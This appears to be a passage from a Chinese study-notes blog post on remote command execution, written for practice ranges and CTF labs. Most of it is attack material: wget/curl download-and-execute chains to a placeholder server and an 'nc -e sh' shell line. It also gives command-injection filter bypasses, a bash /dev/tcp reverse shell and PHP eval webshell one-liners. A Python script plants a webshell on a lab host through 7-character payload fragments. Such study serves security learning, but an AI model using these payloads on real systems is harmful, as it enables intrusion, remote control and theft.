<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">find . -name <span class="hljs-string">&quot;flag*&quot;</span>   ---找所有以 `flag` 开头的文件。<br></code></pre></td></tr></table></figure>

<p>注意：最好加引号，避免 <code>*</code> 被 shell 提前展开。</p>
<h4 id="type-按类型找"><a href="#type-按类型找" class="headerlink" title="-type 按类型找"></a><code>-type</code> 按类型找</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">find . -<span class="hljs-built_in">type</span> f<br></code></pre></td></tr></table></figure>

<p>找普通文件。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">find . -<span class="hljs-built_in">type</span> d<br></code></pre></td></tr></table></figure>

<p>找目录。</p>
<p>常见的：</p>
<ul>
<li><code>f</code>：普通文件</li>
<li><code>d</code>：目录</li>
<li><code>l</code>：符号链接</li>
</ul>
<p>例如：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">find . -<span class="hljs-built_in">type</span> f -name <span class="hljs-string">&quot;*.php&quot;</span>   ---找当前目录下所有 PHP 文件。<br></code></pre></td></tr></table></figure>

<h4 id="perm-按权限找"><a href="#perm-按权限找" class="headerlink" title="-perm 按权限找"></a><code>-perm</code> 按权限找</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">find . -perm 777   ---找权限正好是 `777` 的文件。<br></code></pre></td></tr></table></figure>

<h4 id="找-SUID-文件"><a href="#找-SUID-文件" class="headerlink" title="找 SUID 文件"></a>找 SUID 文件</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">find / -perm -4000 2&gt;/dev/null   ---这个很重要，常用于 Linux 提权。<br></code></pre></td></tr></table></figure>

<hr>
<h4 id="找可写目录"><a href="#找可写目录" class="headerlink" title="找可写目录"></a>找可写目录</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">find / -writable -<span class="hljs-built_in">type</span> d 2&gt;/dev/null   ---查哪些目录可写。<br></code></pre></td></tr></table></figure>

<h3 id="wget指令"><a href="#wget指令" class="headerlink" title="wget指令"></a>wget指令</h3><h4 id="下载一个脚本然后执行"><a href="#下载一个脚本然后执行" class="headerlink" title="下载一个脚本然后执行"></a>下载一个脚本然后执行</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs bash">wget http://your-server/test.sh<br><span class="hljs-built_in">chmod</span> +x test.sh<br>./test.sh<br></code></pre></td></tr></table></figure>

<p>或者直接：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">wget -O test.sh http://your-server/test.sh &amp;&amp; <span class="hljs-built_in">chmod</span> +x test.sh &amp;&amp; ./test.sh<br></code></pre></td></tr></table></figure>

<h4 id="下载到标准输出，再交给-shell-执行"><a href="#下载到标准输出，再交给-shell-执行" class="headerlink" title="下载到标准输出，再交给 shell 执行"></a>下载到标准输出，再交给 shell 执行</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">wget -qO- http://your-server/test.sh | sh<br></code></pre></td></tr></table></figure>

<p>这个组合极常见。</p>
<p>拆开看：</p>
<ul>
<li><code>-q</code>：安静模式，不显示下载过程</li>
<li><code>-O-</code>：输出到标准输出</li>
<li><code>| sh</code>：把下载到的内容直接交给 <code>sh</code> 执行</li>
</ul>
<p>如果脚本是 bash 的，也可以：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">wget -qO- http://your-server/test.sh | bash   ---这个不落地，不生成文件，动作很快。<br></code></pre></td></tr></table></figure>

<hr>
<h4 id="7-3-下载后直接看内容"><a href="#7-3-下载后直接看内容" class="headerlink" title="7.3 下载后直接看内容"></a>7.3 下载后直接看内容</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">wget -qO- http://example.com/flag.txt     ---如果你只是想看网页、文本、配置文件内容，而不想保存成本地文件，这是最方便的。<br></code></pre></td></tr></table></figure>

<hr>
<h4 id="7-4-下载二进制工具然后赋权运行"><a href="#7-4-下载二进制工具然后赋权运行" class="headerlink" title="7.4 下载二进制工具然后赋权运行"></a>7.4 下载二进制工具然后赋权运行</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs bash">wget -O exp http://your-server/exp<br><span class="hljs-built_in">chmod</span> +x exp<br>./exp<br></code></pre></td></tr></table></figure>

<p>一行写法：</p>
<figure class="highlight perl"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs perl">wget -O <span class="hljs-keyword">exp</span> http:<span class="hljs-regexp">//</span>your-server/<span class="hljs-keyword">exp</span> &amp;&amp; <span class="hljs-keyword">chmod</span> +<span class="hljs-keyword">x</span> <span class="hljs-keyword">exp</span> &amp;&amp; ./<span class="hljs-keyword">exp</span><br></code></pre></td></tr></table></figure>

<hr>
<h4 id="7-5-下载到指定目录后执行"><a href="#7-5-下载到指定目录后执行" class="headerlink" title="7.5 下载到指定目录后执行"></a>7.5 下载到指定目录后执行</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">wget -P /tmp http://your-server/test.sh &amp;&amp; <span class="hljs-built_in">chmod</span> +x /tmp/test.sh &amp;&amp; /tmp/test.sh   ---靶机当前目录不可写时很常见。<br></code></pre></td></tr></table></figure>

<hr>
<h4 id="8-常用参数"><a href="#8-常用参数" class="headerlink" title="8. 常用参数"></a>8. 常用参数</h4><hr>
<h4 id="q-静默模式"><a href="#q-静默模式" class="headerlink" title="-q 静默模式"></a><code>-q</code> 静默模式</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">wget -q URL   ---不显示下载进度。<br></code></pre></td></tr></table></figure>

<p>常和 <code>-O-</code> 搭配：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">wget -qO- URL<br></code></pre></td></tr></table></figure>

<hr>
<h4 id="O-指定输出文件"><a href="#O-指定输出文件" class="headerlink" title="-O 指定输出文件"></a><code>-O</code> 指定输出文件</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">wget -O a.txt URL   ---不是数字 0，是大写字母 O。<br></code></pre></td></tr></table></figure>

<hr>
<h4 id="c-断点续传"><a href="#c-断点续传" class="headerlink" title="-c 断点续传"></a><code>-c</code> 断点续传</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">wget -c URL<br></code></pre></td></tr></table></figure>

<hr>
<h4 id="P-指定下载目录"><a href="#P-指定下载目录" class="headerlink" title="-P 指定下载目录"></a><code>-P</code> 指定下载目录</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">wget -P /tmp URL<br></code></pre></td></tr></table></figure>

<p>有些 HTTPS 证书有问题，可以跳过校验：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">wget --no-check-certificate URL<br></code></pre></td></tr></table></figure>

<p>例如：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">wget --no-check-certificate https://example.com/a.sh<br></code></pre></td></tr></table></figure>

<hr>
<h3 id="post-data"><a href="#post-data" class="headerlink" title="--post-data"></a><code>--post-data</code></h3><p>可以发 POST 请求：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">wget --post-data=<span class="hljs-string">&quot;a=1&amp;b=2&quot;</span> -O- http://example.com/test.php   ---这个在一些调试场景能用到。<br></code></pre></td></tr></table></figure>

<hr>
<h4 id="header"><a href="#header" class="headerlink" title="--header"></a><code>--header</code></h4><p>自定义请求头：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">wget --header=<span class="hljs-string">&quot;Cookie: PHPSESSID=xxxx&quot;</span> -O- http://example.com/   ---例如带 cookie 抓页面内容。<br></code></pre></td></tr></table></figure>

<hr>
<h4 id="user-agent"><a href="#user-agent" class="headerlink" title="--user-agent"></a><code>--user-agent</code></h4><p>伪造 UA：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">wget --user-agent=<span class="hljs-string">&quot;Mozilla/5.0&quot;</span> -O- http://example.com/<br></code></pre></td></tr></table></figure>

<hr>
<h4 id="9-wget-和管道、其他命令的组合技"><a href="#9-wget-和管道、其他命令的组合技" class="headerlink" title="9. wget 和管道、其他命令的组合技"></a>9. <code>wget</code> 和管道、其他命令的组合技</h4><p>这部分是重点。</p>
<hr>
<h4 id="wget-sh"><a href="#wget-sh" class="headerlink" title="wget | sh"></a>wget | sh</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">wget -qO- http://your-server/a.sh | sh<br></code></pre></td></tr></table></figure>

<p>用途：</p>
<ul>
<li>下载一个 shell 脚本</li>
<li>直接执行</li>
<li>不落地</li>
</ul>
<p>如果脚本里用了 bash 语法：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">wget -qO- http://your-server/a.sh | bash<br></code></pre></td></tr></table></figure>

<hr>
<h2 id="9-2-wget-chmod-执行"><a href="#9-2-wget-chmod-执行" class="headerlink" title="9.2 wget &amp;&amp; chmod &amp;&amp; 执行"></a>9.2 <code>wget &amp;&amp; chmod &amp;&amp; 执行</code></h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">wget -O run.sh http://your-server/run.sh &amp;&amp; <span class="hljs-built_in">chmod</span> +x run.sh &amp;&amp; ./run.sh   ---这是最常见的“下载-赋权-执行”链。<br></code></pre></td></tr></table></figure>

<hr>
<h2 id="9-3-wget-grep"><a href="#9-3-wget-grep" class="headerlink" title="9.3 wget | grep"></a>9.3 <code>wget | grep</code></h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">wget -qO- http://example.com | grep <span class="hljs-string">&quot;flag&quot;</span><br></code></pre></td></tr></table></figure>

<p>用途：</p>
<ul>
<li>抓网页源码</li>
<li>从中筛关键字</li>
</ul>
<p>也可以提取 flag：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">wget -qO- http://example.com | grep -o <span class="hljs-string">&#x27;flag&#123;[^&#125;]*&#125;&#x27;</span><br></code></pre></td></tr></table></figure>

<hr>
<h4 id="9-4-wget-strings"><a href="#9-4-wget-strings" class="headerlink" title="9.4 wget | strings"></a>9.4 <code>wget | strings</code></h4><p>如果抓下来的内容可能不是纯文本，或者你想抽可打印字符串：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">wget -qO- http://example.com/file.bin | strings<br></code></pre></td></tr></table></figure>

<p>再结合 grep：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">wget -qO- http://example.com/file.bin | strings | grep flag<br></code></pre></td></tr></table></figure>

<h3 id="curl指令"><a href="#curl指令" class="headerlink" title="curl指令"></a>curl指令</h3><h4 id="最常用"><a href="#最常用" class="headerlink" title="最常用"></a>最常用</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs bash">curl URL<br>curl -s URL   静默，不显示进度<br>curl -L URL   跟随跳转<br>curl -I URL   只看响应头<br>curl -o 文件名 URL   自定义保存名<br>curl -O URL   用原文件名保存<br></code></pre></td></tr></table></figure>

<h3 id="nc指令"><a href="#nc指令" class="headerlink" title="nc指令"></a>nc指令</h3><p>常见连接shell命令</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">nc IP 端口 -e sh   ---在靶机上<br></code></pre></td></tr></table></figure>

<h3 id="dd指令"><a href="#dd指令" class="headerlink" title="dd指令"></a>dd指令</h3><p>基本框架</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">dd</span> <span class="hljs-keyword">if</span>=要拷贝的文件 of=拷贝后输出的文件 bs=1 skip=0 count=100   ---从1字节开始，每有一个字节就复制到文件，一直到第100个字节为止<br>例：<span class="hljs-built_in">dd</span> <span class="hljs-keyword">if</span>=/tmp/flag.txt of=/var/www/html/1.php bs=1 skip=0 count=100<br><span class="hljs-built_in">dd</span> <span class="hljs-keyword">if</span>=/tmp/flag.txt of=/var/www/html/1.php bs=1 skip=0 count=100 |strings 提取后直接查看<br></code></pre></td></tr></table></figure>

<h2 id="Ping场景"><a href="#Ping场景" class="headerlink" title="Ping场景"></a>Ping场景</h2><p><img src="/img/rce/2.png" srcset="/img/loading.gif" lazyload></p>
<p>如图，当输入ping的地址后就是|的隔断输入指令</p>
<p>而对于管道符，这里有几种绕过</p>
<p><strong>LINUX系统的管道符:</strong><br>1、” ; “: 执行完前面的语句在执行后面的语句。<br>2、” | “: 显示后面的语句的执行结果。<br>3、” || “：当前的语句执行出错时，执行后面的语句。<br>4、” &amp; “：两条命令都执行，如果前面语句为假则执行后面的语句，前面的语句可真可假。<br>5、” &amp;&amp; “：如果前面的语句为假则直接出错，也不执行后面的语句，前面的语句为真则执行两条命令，前面的语句只能为真。</p>
<h3 id="WINDOWS系统的管道符"><a href="#WINDOWS系统的管道符" class="headerlink" title="WINDOWS系统的管道符:"></a><strong>WINDOWS系统的管道符:</strong></h3><p>1、” | “ :是直接后面的执行语句<br>2、” || “ :如果前面的语句执行失败，则执行后面的语句，前面的语句只能为假才能执行。<br>3、” &amp; “ :两条命令都执行，如果前面的语句为假则直接执行后面的语句，前面的语句可真可假。<br>4、” &amp;&amp; “ :如果前面的语句为假则直接出错，也不执行后面的语句，前面的语句为真则两条命令都执行，前面的语句只能为真。<br>注：windows没有“;”</p>
<h4 id="过滤空格"><a href="#过滤空格" class="headerlink" title="过滤空格"></a>过滤空格</h4><p>知识点:空格可以替换 &lt;,&lt;&gt;,${IFS},$IFS，%20(space),%09(tab),$IFS$9,$IFS$1<br>因为空格被过滤，所以</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">127.0.0.1&amp;<span class="hljs-built_in">cat</span>&lt;flag.php<br></code></pre></td></tr></table></figure>

<p>查看网页源代码就有答案了哈。</p>
<h4 id="过滤运算符"><a href="#过滤运算符" class="headerlink" title="过滤运算符"></a>过滤运算符</h4><p>运算符分号可以用 %0a,%0d,%0D%0A替代。</p>
<h4 id="变量拼接"><a href="#变量拼接" class="headerlink" title="变量拼接"></a>变量拼接</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">?ip=127.0.0.1;a=g;<span class="hljs-built_in">cat</span>$IFS$9fla<span class="hljs-variable">$a</span>.php<br></code></pre></td></tr></table></figure>

<h3 id="base64编码"><a href="#base64编码" class="headerlink" title="base64编码"></a>base64编码</h3><p>echo$IFS$1Y2F0IC90bXAvZmxhZy50eHQ&#x3D;|base64$IFS$1-d|sh<br><code>Y2F0IC90bXAvZmxhZy50eHQ=</code>解码为&#96;cat &#x2F;tmp&#x2F;flag.txt</p>
<p>(base32也如此)</p>
<p>但是在常规rce中，语法为</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">base32</span> /tmp/flag.txt | <span class="hljs-built_in">base32</span> -d<br></code></pre></td></tr></table></figure>

<p>base64也如此</p>
<h3 id="内敛绕过"><a href="#内敛绕过" class="headerlink" title="内敛绕过"></a>内敛绕过</h3><p>就是将反引号内命令的输出作为输入执行。<br>?ip&#x3D;127.0.0.1;cat$IFS$1<code>ls</code><br>会抓取ls返回的所有文件的内容</p>
<h3 id="00截断绕strpos函数"><a href="#00截断绕strpos函数" class="headerlink" title="00截断绕strpos函数"></a>00截断绕strpos函数</h3><p>PHP5.2+可以用截断漏洞（%00）绕过strpos检验函数</p>
<h3 id="打反弹shell"><a href="#打反弹shell" class="headerlink" title="打反弹shell"></a>打反弹shell</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">127.0.0.1|bash -c <span class="hljs-string">&#x27;exec bash -i &amp;&gt;/dev/tcp/ip/port&lt;&amp;1&#x27;</span><br></code></pre></td></tr></table></figure>

<h2 id="RCE写入木马"><a href="#RCE写入木马" class="headerlink" title="RCE写入木马"></a>RCE写入木马</h2><p>命令执行写入一句话</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">echo</span> <span class="hljs-string">&quot;&lt;?php @eval(\$_POST[\&#x27;test\&#x27;]);?&gt;&quot;</span> &gt; 1.php<br></code></pre></td></tr></table></figure>

<p>代码执行写入一句话</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash">system(<span class="hljs-string">&#x27;echo &quot;&lt;?php @eval($_POST[\&#x27;</span><span class="hljs-built_in">test</span>\&#x27;]);?&gt;<span class="hljs-string">&quot; &gt; 1.php&#x27;);</span><br><span class="hljs-string">?a=file_put_contents(&#x27;1.php&#x27;,&#x27;&lt;?php @eval(<span class="hljs-variable">$_POST</span>[\&#x27;test\&#x27;]);?&gt;&#x27;);</span><br></code></pre></td></tr></table></figure>

<h2 id="实战"><a href="#实战" class="headerlink" title="实战"></a>实战</h2><h3 id="好靶场：只允许你输入7个字符，你还能执行你想要的命令吗"><a href="#好靶场：只允许你输入7个字符，你还能执行你想要的命令吗" class="headerlink" title="好靶场：只允许你输入7个字符，你还能执行你想要的命令吗"></a>好靶场：只允许你输入7个字符，你还能执行你想要的命令吗</h3><p>这里的思路是</p>
<ol>
<li>利用 <code>&gt;</code> 重定向和 <code>\</code> 换行，将长命令分割成多个7字符片段写入文件</li>
<li><strong><code>ls -t</code> 排序</strong>：按时间顺序排列文件名，组合成完整命令</li>
<li><strong>执行</strong>：通过 <code>sh</code> 执行构造好的脚本</li>
</ol>
<p>攻击脚本如下</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> time<br><span class="hljs-keyword">import</span> requests<br><br>url = <span class="hljs-string">&quot;http://4x4qj9v.haobachang2.loveli.com.cn:8888/&quot;</span><br><br><span class="hljs-keyword">with</span> <span class="hljs-built_in">open</span>(<span class="hljs-string">&quot;payload.txt&quot;</span>, <span class="hljs-string">&#x27;r&#x27;</span>) <span class="hljs-keyword">as</span> f:<br>    <span class="hljs-keyword">for</span> line <span class="hljs-keyword">in</span> f.readlines():<br>        payload = line.strip()<br>        data = &#123;<br>            <span class="hljs-string">&#x27;command&#x27;</span>: payload<br>        &#125;<br><br>        <span class="hljs-keyword">try</span>:<br>            response = requests.post(url, data=data)<br>            <span class="hljs-built_in">print</span>(<span class="hljs-string">f&quot;已发送 payload: <span class="hljs-subst">&#123;payload&#125;</span>&quot;</span>)<br>            <span class="hljs-built_in">print</span>(<span class="hljs-string">f&quot;状态码: <span class="hljs-subst">&#123;response.status_code&#125;</span>&quot;</span>)<br>        <span class="hljs-keyword">except</span> Exception <span class="hljs-keyword">as</span> e:<br>            <span class="hljs-built_in">print</span>(<span class="hljs-string">f&quot;请求失败: <span class="hljs-subst">&#123;e&#125;</span>&quot;</span>)<br>        time.sleep(<span class="hljs-number">0.2</span>)<br><span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;所有payload发送完成&quot;</span>)<br><br><span class="hljs-keyword">try</span>:<br>    check_response = requests.get(<span class="hljs-string">&quot;http://4x4qj9v.haobachang2.loveli.com.cn:8888/1.php&quot;</span>)<br>    <span class="hljs-keyword">if</span> check_response.status_code == <span class="hljs-number">200</span>:<br>        <span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;成功上传webshell!&quot;</span>)<br>    <span class="hljs-keyword">else</span>:<br>        <span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;webshell可能未成功上传&quot;</span>)<br><span class="hljs-keyword">except</span>:<br>    <span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;检查webshell时出错&quot;</span>)<br></code></pre></td></tr></table></figure>

<p>然后同文件夹payload.txt里面写上：</p>
<figure class="highlight livescript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><code class="hljs livescript">&gt;hp<br>&gt;<span class="hljs-number">1.p</span><span class="hljs-string">\\</span><br>&gt;d<span class="hljs-string">\&gt;\\</span><br>&gt;<span class="hljs-string">\</span> -<span class="hljs-string">\\</span><br>&gt;e64<span class="hljs-string">\\</span><br>&gt;bas<span class="hljs-string">\\</span><br>&gt;<span class="hljs-string">\|\\</span><br>&gt;z8+<span class="hljs-string">\\</span><br>&gt;<span class="hljs-number">0p</span>O<span class="hljs-string">\\</span><br>&gt;xJ1<span class="hljs-string">\\</span><br>&gt;Wyc<span class="hljs-string">\\</span><br>&gt;<span class="hljs-number">1</span>NU<span class="hljs-string">\\</span><br>&gt;<span class="hljs-number">9</span>QT<span class="hljs-string">\\</span><br>&gt;oJF<span class="hljs-string">\\</span><br>&gt;YWw<span class="hljs-string">\\</span><br>&gt;GV2<span class="hljs-string">\\</span><br>&gt;AgQ<span class="hljs-string">\\</span><br>&gt;waH<span class="hljs-string">\\</span><br>&gt;PD9<span class="hljs-string">\\</span><br>&gt;o<span class="hljs-string">\</span> <span class="hljs-string">\\</span><br>&gt;ech<span class="hljs-string">\\</span><br>ls -t&gt;<span class="hljs-number">0</span><br>sh <span class="hljs-number">0</span><br></code></pre></td></tr></table></figure>

<p>这里base64转码得到</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span> <span class="hljs-keyword">eval</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-number">1</span>]);<span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>运行连接蚁剑，拿到flag</p>
<h2 id="杂payload"><a href="#杂payload" class="headerlink" title="杂payload"></a>杂payload</h2><h4 id="一些绕过"><a href="#一些绕过" class="headerlink" title="一些绕过"></a>一些绕过</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-variable">$0</span> /???/????.???   ---/tmp/flag.txt<br>$<span class="hljs-string">&#x27;\143\141\164&#x27;</span> $<span class="hljs-string">&#x27;\057\164\155\160\057\146\154\141\147\056\164\170\164&#x27;</span>   ---转八进制<br>. /???/????.???   ---.加空格转为可读文件<br></code></pre></td></tr></table></figure>

<h4 id="5字符限制绕过"><a href="#5字符限制绕过" class="headerlink" title="5字符限制绕过"></a>5字符限制绕过</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><code class="hljs bash">&gt;l\\<br>&gt;s\\<br>&gt;\ \\<br>&gt;\&gt;0<br>&gt;-t\\<br><span class="hljs-built_in">ls</span>&gt;a<br><span class="hljs-built_in">ls</span>&gt;&gt;a<br>&gt;hp<br>&gt;p\\<br>&gt;1.\\<br>&gt;\&gt;\\<br>&gt;-d\\<br>&gt;\ \\<br>&gt;64\\<br>&gt;se\\<br>&gt;ba\\<br>&gt;\|\\<br>&gt;k7\\<br>&gt;XS\\<br>&gt;sx\\<br>&gt;VF\\<br>&gt;dF\\<br>&gt;X0\\<br>&gt;gk\\<br>&gt;bC\\<br>&gt;Zh\\<br>&gt;ZX\\<br>&gt;Ag\\<br>&gt;aH\\<br>&gt;9w\\<br>&gt;PD\\<br>&gt;S&#125;\\<br>&gt;IF\\<br>&gt;&#123;\\<br>&gt;\$\\<br>&gt;ho\\<br>&gt;ec\\<br>sh a<br>Sh 0<br>参数：1<br></code></pre></td></tr></table></figure>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/" class="category-chain-item">学习笔记</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/RCE%E6%BC%8F%E6%B4%9E/" class="print-no-link">#-RCE漏洞</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>记录一次RCE的学习和有关Linux基础指令学习</div>
      <div>https://azumisaki.github.io/2026/04/14/rce/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>AzumiSaki</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2026年4月14日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2026/04/11/include/" title="记录一次文件包含的学习以及实战演练">
                        <span class="hidden-mobile">记录一次文件包含的学习以及实战演练</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



